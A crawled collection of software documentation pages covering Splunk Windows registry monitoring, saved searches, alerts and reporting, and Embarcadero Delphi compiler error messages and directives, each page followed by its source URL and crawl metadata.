specific regular expressions you create to refine and filter the hive key paths you want Splunk to monitor. sysmon.conf contains only one stanza, where you specify: event_types: the superset of registry event types you want to monitor. Can be delete, set, create, rename, open, close, query. active_filters: the list of regular expression filters you've defined in regmon-filters.conf that specify exactly which processes and hive paths you want Splunk to monitor. This is a comma-separated list of the stanza names from regmon-filters.conf. disabled: whether to monitor registry settings changes or not. Set this to 1 to disable Windows registry monitoring altogether. Each stanza in regmon-filters.conf represents a particular filter whose definition includes: proc: a regular expression containing the path to the process or processes you want to monitor. hive: a regular expression containing the hive path to the entry or entries you want to monitor. Splunk supports the root key value mappings predefined in Windows: \\REGISTRY\\USER\\ maps to HKEY_USERS or HKU \\REGISTRY\\USER\\ maps to HKEY_CURRENT_USER or HKCU \\REGISTRY\\USER\\_Classes maps to HKEY_CLASSES_ROOT or HKCR \\REGISTRY\\MACHINE maps to HKEY_LOCAL_MACHINE or HKLM \\REGISTRY\\MACHINE\\SOFTWARE\\Classes maps to HKEY_CLASSES_ROOT or HKCR \\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Hardware Profiles\\Current maps to HKEY_CURRENT_CONFIG or HKCC type: the subset of event types to monitor. Can be delete, set, create, rename, open, close, query. 
The values here must be a subset of the values for event_types that you set in sysmon.conf. baseline: whether or not to capture a baseline snapshot for that particular hive path. 0 for no and 1 for yes. baseline interval: how long Splunk has to have been down before re-taking the snapshot, in seconds. The default value is 24 hours (86400 seconds). Get a baseline snapshot When you enable Registry monitoring, you're given the option of recording a baseline snapshot of your registry hives the next time Splunk starts. By default, the snapshot covers the entirety of the user keys and machine keys. Note: Executing a splunk clean all -f deletes the current baseline snapshot. What to consider When you install Splunk on a Windows machine and enable registry monitoring, you specify which major hive paths to monitor: key users (HKU) and/or key local machine (HKLM). Depending on how dynamic you expect the registry to be on this machine, checking both could result in a great deal of data for Splunk to monitor. If you're expecting a lot of registry events, you may want to specify some filters in regmon-filters.conf to narrow the scope of your monitoring immediately after you install Splunk and enable registry event monitoring but before you start Splunk up. Similarly, you have the option of capturing a baseline snapshot of the current state of your Windows registry when you first start Splunk, and again every time a specified amount of time has passed. The baselining process can be somewhat processor-intensive, and may take several minutes. You can postpone taking a baseline snapshot until you've edited regmon-filters.conf and narrowed the scope of the registry entries to those you specifically want Splunk to monitor. Configure Windows registry input Look at inputs.conf to see the default values for Windows registry input. They are also shown below. If you want to make changes to the default values, edit a copy of inputs.conf in $SPLUNK_HOME\etc\system\local\. You only have to provide values for the parameters you want to change within the stanza. For more information about how to work with Splunk configuration files, refer to About configuration files. [script://$SPLUNK_HOME\bin\scripts\splunk-regmon.py]: The Splunk registry input monitoring script (splunk-regmon.py) is configured as a scripted input. Do not change this value. Note: You must use two backslashes \\ to escape wildcards in stanza names in inputs.conf. Regexes with backslashes in them are not currently supported when specifying paths to monitor.
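To illustrate the filter attributes described above, a hypothetical regmon-filters.conf stanza might look like the following (a sketch only; the stanza name, process regex, hive regex, and type list are invented for this example):
[UserRunKeys]
# Watch changes made by any process (proc is a regex over the process path).
proc = .*
# Watch the per-user Run keys under HKEY_USERS.
hive = \\REGISTRY\\USER\\.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\.*
# Record only these event types; they must be a subset of event_types in sysmon.conf.
type = set|create|delete|rename
# Capture a baseline snapshot for this hive path.
baseline = 1
For the filter to take effect, its stanza name (UserRunKeys in this sketch) would also have to be listed in active_filters in sysmon.conf.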
http://docs.splunk.com/Documentation/Splunk/4.0.1/Admin/MonitorWindowsregistrydata
2012-05-27T02:51:06
crawl-003
crawl-003-017
[]
docs.splunk.com
Save and schedule searches, set alerts, and enable summary indexing You can turn any saved search (in Admin > Saved Searches) into a scheduled alert. To schedule a saved search, define a frequency for your search to run. To turn a scheduled search into an alert, set conditions for triggering the alert. Then, define actions to perform when the alert conditions are met. For more information about using Splunk for alerting, watch this video. This page discusses how to save searches, schedule searches, and configure alert conditions. For more in-depth discussion of saved searches and alerting, see the Admin manual section on saved searches. Save a search First, create a saved search: 1. Click on the search bar drop-down menu and select Save search... This opens the Save search dialog box. 2. In the Search tab, name your search. 3. In the Search field, edit your search if necessary. 4. Select a role to share your saved search. You can Share with role Admin, Everybody, User, and Power, or Don't Share with anyone. 5. Check one or more dashboards to save and display your search. 6. Click Save. Schedule a search Then, set a schedule for your search: 1. From the search bar menu, choose Save search... 2. Click the Schedule and Alert tab. 3. Under Schedule, check Run this search on a schedule. 4. Choose either Basic or Cron to define your schedule frequency. - Basic lets you choose from predefined schedule options, Run every: minute, 5 minutes, 30 minutes, hour, 12 hours, day at midnight, day at 6pm, and Saturday at midnight. - Cron lets you use cron notation to define your schedule frequency. Caution: Splunk implements cron differently than standard POSIX cron. Use the */n as "divide by n" (instead of crontab's "every n"). For example, enter */3 * * * 1-5 to run your search every twenty minutes, Monday through Friday. Here are some other Splunk cron examples: "*/12 * * * *" : "Every 5 minutes" "*/2 * * * *" : "Every 30 minutes" "0 */2 * * *" : "Every 12 hours, on the hour" Specify time range To ensure that you get all the results within a time period, you may want to edit the Search field (in the Search tab) to include a specific time range in your search. For example, if you want all the results within an hour time window, such as between 4 PM and 5 PM: - Add the terms startminutesago=90 and endminutesago=30 to your search. - Use Cron notation to define your schedule on the half hour. Configure an alert After you schedule a search, you can configure an alert. Define alert conditions based on thresholds in the number of events, sources, and hosts in your results. When these conditions are met, Splunk notifies you via email or RSS feed. To configure an alert, define the alert condition: 1. In the first drop-down menu under Alert when, choose either always, number of events, number of sources, or number of hosts. 2. In the second drop-down menu under Alert when, choose a comparison operation: greater than, less than, equal to, rises by, or drops by. 3. In the text field under Alert when, enter a value. For example, you may want to "Alert when number of events [is] greater than 10". 4. Define how you want Splunk to notify you. - If you want to receive information in an RSS feed, check Create an RSS feed. - If you want to receive email notification, enter one or more email addresses under Send email. 
Separate multiple addresses with a comma. Note: You can combine any of these options. 5. Next, if you want to include the search results in your alert, check Include results. 6. Finally, if you want to run a shell command when an alert triggers, enter the command under Trigger shell script. For example, you may want to trigger a script to generate an SNMP trap or call an API to send the event to another system. For more details on configuring alerts, see the Admin Manual topic on alerts. Specify fields to show When you receive alerts, Splunk includes all the fields in your search. To control which fields appear, edit the search to use the fields command, for example: starthoursago=3 | fields - $FIELD1,$FIELD2 + $FIELD3,$FIELD4 The alert you receive will exclude $FIELD1 and $FIELD2, but include $FIELD3 and $FIELD4. Enable summary indexing Summary indexing is an alert action that you can configure for any scheduled search which already exists. 1. In the Admin page in Splunk Web, create a scheduled search under the Saved searches heading. 2. Select Run this search on a schedule to configure alert properties for the scheduled search. If you want your search to run every time without checking for an alert condition, select "always" as the alert condition. 3. Check Enable summary indexing. 4. Optionally, add a field/value pair to the search results that are being summary indexed from the scheduled search. Once you enable summary indexing, configure it further by editing configuration files. When the summary indexing search runs, it will tell you that the result has been "stashed". Note: Currently, you can only add one field/value pair when configuring summary indexing in Splunk Web. You can add additional field/values to events by specifying them in savedsearches.conf. Note: Learn more about configuring summary indexing in the Admin manual.
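Putting the scheduling and time-range tips together: a hypothetical scheduled search could use the search string sourcetype=syslog error startminutesago=90 endminutesago=30 with the Cron schedule */2 * * * * (every 30 minutes under Splunk's divide-by-n notation). Each run then covers a one-hour window that ends 30 minutes in the past, so events that arrive late are still counted. The sourcetype and search terms here are illustrative assumptions, not values from this topic.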
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/SaveScheduleSetAlertsAndEnableSummaryIndexing
2012-05-26T18:40:10
crawl-003
crawl-003-017
[]
docs.splunk.com
Save options You can save any of your searches, schedule your saved searches, and define alert conditions for your scheduled searches. For more information, refer to the User Manual topic about Save, schedule, and alert options. Save a search This example saves a search for trade_app_logouts events in the sampledata index: index=sampledata eventtype=trade_app_logouts To save a search: 1. Click on the search bar menu. 2. Select Save search... from the menu. The Save Search dialog box opens. 3. In the "Search options" tab, name your search. (In 3.3, this is Search.) 4. Click Save. Note: When saving your search, you can choose to add it to one or more dashboards. Splunk lets you delete or modify your saved searches and add them to the dashboard. For more information on how to manage saved searches, refer to the User Manual's Find and manage saved searches page. Schedule the search From the search bar menu: 1. Choose Save search... 2. Click the Schedule & Alerts tab. (In 3.3, this is Schedule and Alert.) 3. Under Schedule, check "Run this search on a schedule". Note: You can define the schedule frequency with the Basic or Cron options. Schedule an alert After you schedule a search, you can define alert conditions based on thresholds in the number of events, sources, and hosts in your results. You can receive these alerts via RSS feed or email. You can also trigger a shell script, such as a script to generate an SNMP trap or call an API to send the event to another system. If you need additional email options (like setting the From: address) see the Alerts page in the Admin manual.
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/SaveOptions
2012-05-26T18:40:01
crawl-003
crawl-003-017
[]
docs.splunk.com
Run reports Summarize the results of any search as a report using the report window in Splunk Web. Access the reports window in three ways: - After running a search, click Report on results >> located below the search bar. - Select Report on this field >> from any interactive field filter menu. - Pipe your search results to a reporting command (such as stats, top, or rare). For more information about reporting with Splunk, you can watch this video. Report on results Run any search in Splunk Web (either with the search bar, or by running a saved search). After the results load, click Report on results >> above the timeline options. This takes you to the reports page so you can build a new report. Select a field from the Fields list. Splunk updates your search string with | top <field name you selected> and displays a report. The default report displays: - A chart graphing the results (the top 100 values of the field you selected). - A summary of the count and events matching your search. Tune a report by: - Adjusting the search string by using the search bar at the top of the page. - Adjusting the search's timerange using the timerange selection tools under the search bar (shows the current day by default). - Selecting fields to report on that Splunk identifies in the Fields panel. - Defining a data series or chart style using the Series panel. Select Back to search results to see your search results. Report on fields Report on any field that's in the Field menu. By default, Splunk lists host, source, sourcetype, and any indexed field in the Fields menu. Note: Add additional fields to the Field menu by using the fields picker (Fields drop-down menu above your search results). To report on fields: - Click on the Fields... menu. - From the list, check and apply src. - From the src filter menu, choose Report on this field >>. Splunk takes you to the report window and updates your search string. Modify your report the same way you do when you click on Report on results. Report using reporting commands Create reports using the search language. Pipe your search results to a reporting command. - Create useful graphs and time-based charts using chart and timechart. - See the most common or least common events using top and rare. - Create reports of statistics about your events using stats or eventstats. - See correlations, differences, and associations between fields in your data using associate, correlate, and diff. See examples of useful reports. Choose different charts Change chart styles by selecting a type from the display as drop-down menu above the current chart. Choose from the following chart types: See samples of these charts in the report gallery. Add a report to your dashboard Save a report just as you would any other search. When you save it, you can choose to add it to one or more dashboards. Read more about saving searches to the dashboard in Manage saved searches. Note: You won't see your report on your dashboard if you haven't loaded any data to your main index. As soon as you have data in your main index, the "getting started" links are replaced with a default dashboard including modules that are predefined in the product, plus additional searches and reports you've added. Summary indexing Summary indexing allows you to search and run reports on a smaller, specially generated summary index instead of working with a much larger original data set. Use summary indexing to: - Index aggregate results. 
- Index running statistics (such as a running total). - Index rare original events into a smaller index for more efficient reporting.
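For instance, a report built entirely with reporting commands might look like sourcetype=access_combined | timechart count by host, which charts event counts over time broken out by host; swapping the reporting command for | top host shows the most common hosts instead. The sourcetype value is an illustrative assumption.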
http://docs.splunk.com/Documentation/Splunk/3.4.8/User/RunReports
2012-05-26T18:39:52
crawl-003
crawl-003-017
[]
docs.splunk.com
An interface type specified with dispinterface cannot specify an ancestor interface. program Produce; type IBase = interface end; IExtend = dispinterface (IBase) ['{00000000-0000-0000-0000-000000000000}'] end; begin end. In the example above, the error is caused because IExtend attempts to specify an ancestor interface type. program Solve; type IBase = interface end; IExtend = dispinterface ['{00000000-0000-0000-0000-000000000000}'] end; begin end. Generally there are two solutions when this error occurs: remove the ancestor interface declaration, or change the dispinterface into a regular interface type. In the example above, the former approach was taken.
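For completeness, the latter approach (keeping the ancestor by changing the dispinterface into a regular interface) would look roughly like this sketch, which reuses the placeholder GUID from the examples above:
program SolveAlt;
type
  IBase = interface
  end;
  IExtend = interface (IBase)
    ['{00000000-0000-0000-0000-000000000000}']
  end;
begin
end.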
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_disp_intf_ancestor_xml.html
2012-05-27T03:06:27
crawl-003
crawl-003-017
[]
docs.embarcadero.com
A directive was encountered during the parsing of an interface which is not allowed. program Produce; type IBaseIntf = interface private procedure fnord(x, y, z : Integer); end; begin end. In this example, the compiler gives an error when it encounters the private directive, as it is not allowed in interface types. program Solve; type IBaseIntf = interface procedure fnord(x, y, z : Integer); end; TBaseClass = class (TInterfacedObject, IBaseIntf) private procedure fnord(x, y, z : Integer); end; procedure TBaseClass.fnord(x, y, z : Integer); begin end; begin end. The only solution to this problem is to remove the offending directive from the interface definition. While interfaces do not actually support these directives, you can place the implementing method into the desired visibility section. In this example, placing the TBaseClass.fnord procedure into a private section should have the desired results.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_directive_in_intf_xml.html
2012-05-27T03:06:22
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks Defines a Delphi conditional symbol with the given name. The symbol is recognized for the remainder of the compilation of the current module in which the symbol is declared, or until it appears in an {$UNDEF name} directive. The {$DEFINE name} directive has no effect if name is already defined.
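A minimal sketch of typical usage (the symbol name VERBOSE is an arbitrary choice for this example):
program DefineSketch;
{$DEFINE VERBOSE}
begin
  {$IFDEF VERBOSE}
  Writeln('Extra diagnostics enabled.'); // compiled only while VERBOSE is defined
  {$ENDIF}
  {$UNDEF VERBOSE}
  {$IFDEF VERBOSE}
  Writeln('Not compiled: VERBOSE was undefined above.');
  {$ENDIF}
end.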
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsdefinedirective_xml.html
2012-05-27T02:14:53
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $D directive controls the generation of debug information. When a module is compiled in the {$D+} state, the integrated debugger lets you single-step and set breakpoints in that module. The Include debug info (Project|Options|Linker) and Map file (Project|Options|Linker) options produce complete line information for a given module only if you've compiled that module in the {$D+} state. The $D switch is usually used in conjunction with the $L switch, which enables and disables the generation of local symbol information for debugging.
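As a sketch of how the two switches are commonly combined (the unit name is an arbitrary choice for this example):
unit DebuggableUnit;
{$D+,L+} // generate debug information and local symbols so this unit can be stepped through
interface
implementation
end.
Compiling a unit in the {$D-,L-} state instead omits that information, which is typical for units you do not intend to debug.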
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsdebuginformation_xml.html
2012-05-27T02:14:49
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Conditional compilation {$DEFINE DEBUG} {$IFDEF DEBUG} Writeln('Debug is on.'); // this code executes {$ELSE} Writeln('Debug is off.'); // this code does not execute {$ENDIF} {$UNDEF DEBUG} {$IFNDEF DEBUG} Writeln('Debug is off.'); // this code executes {$ENDIF} The following standard conditional symbols are defined: VER<nnn> Always defined, indicating the version number of the Delphi compiler. (Each compiler version has a corresponding predefined symbol. For example, compiler version 18.0 has VER180 defined.) MSWINDOWS Indicates that the operating environment is Windows. Use MSWINDOWS to test for any flavor of the Windows platform instead of WIN32. WIN32 Indicates that the operating environment is the Win32 API. Use WIN32 for distinguishing between specific Windows platforms, such as 32-bit versus 64-bit Windows. In general, don't limit code to WIN32 unless you know for sure that the code will not work in WIN64. Use MSWINDOWS instead. CLR Indicates the code will be compiled for the .NET platform. CPU386 Indicates that the CPU is an Intel 386 or better. CONSOLE Defined if an application is being compiled as a console application. CONDITIONALEXPRESSIONS Tests for the use of $IF directives. For example, to find out the version of the compiler and run-time library that was used to compile your code, you can use $IF with the CompilerVersion, RTLVersion and other constants: {$IFDEF CONDITIONALEXPRESSIONS} {$IF CompilerVersion >= 17.0} {$DEFINE HAS_INLINE} {$IFEND} {$IF RTLVersion >= 14.0} {$DEFINE HAS_ERROUTPUT} {$IFEND} {$ENDIF}
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsconditionalcompilation_xml.html
2012-05-27T02:14:44
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $B directive switches between the two different models of Delphi code generation for the and and or Boolean operators. In the {$B+} state, the compiler generates code for complete Boolean expression evaluation: every operand of an expression built from and and or is evaluated, even when the result of the entire expression is already known. In the default {$B-} state, the compiler generates code for short-circuit Boolean expression evaluation, which means that evaluation stops as soon as the result of the entire expression becomes evident in left to right order of evaluation.
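A small sketch of why the difference matters (the record type and variable are invented for this example):
program ShortCircuitSketch;
type
  PItem = ^TItem;
  TItem = record
    Count: Integer;
  end;
var
  P: PItem;
begin
  P := nil;
  {$B-} // short-circuit evaluation, the default state
  if (P <> nil) and (P^.Count > 0) then
    Writeln('P has items.');
  // In the {$B+} state both operands are evaluated, so P^.Count would be
  // dereferenced even though P is nil, raising an access violation at run time.
end.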
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsbooleanshortcircuitevaluation_xml.html
2012-05-27T02:14:39
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Remarks The $AUTOBOX directive controls whether value types are automatically “boxed” into reference types. The following code will not compile by default; the compiler halts with a message that I and Obj have incompatible types. var I: Integer; Obj: TObject; begin I:=5; Obj:=I; // compilation error end. Inserting {$AUTOBOX ON} anywhere before the offending line will remove the error, so this code compiles: var I: Integer; Obj: TObject; begin I:=5; {$AUTOBOX ON} Obj:=I; // I is autoboxed into a TObject end. Reference types can not be automatically “unboxed” into value types, so a typecast is required to turn the TObject into an Integer: var I: Integer; Obj: TObject; begin I:=5; {$AUTOBOX ON} Obj:=I; // OK // I:=Obj; // Can't automatically unbox; compilation error I:=Integer(Obj); // this works end. Turning on autoboxing can be convenient, but it makes Delphi less type safe, so it can be dangerous. With autoboxing, some errors that would otherwise be caught during compilation may cause problems at runtime. Boxing values into object references also consumes additional memory and degrades execution performance. With {$AUTOBOX ON}, you run the risk of not realizing how much of this data conversion is happening silently in your code. {$AUTOBOX OFF} is recommended for improved type checking and faster runtime execution. The $AUTOBOX directive has no effect in Delphi for Win32.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/compdirsautobox_xml.html
2012-05-27T02:14:33
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Extract and add new fields beneath "Add fields from external data sources".
http://docs.splunk.com/Documentation/Splunk/4.0.10/User/ExtractNewFields
2012-05-26T16:51:46
crawl-003
crawl-003-017
[]
docs.splunk.com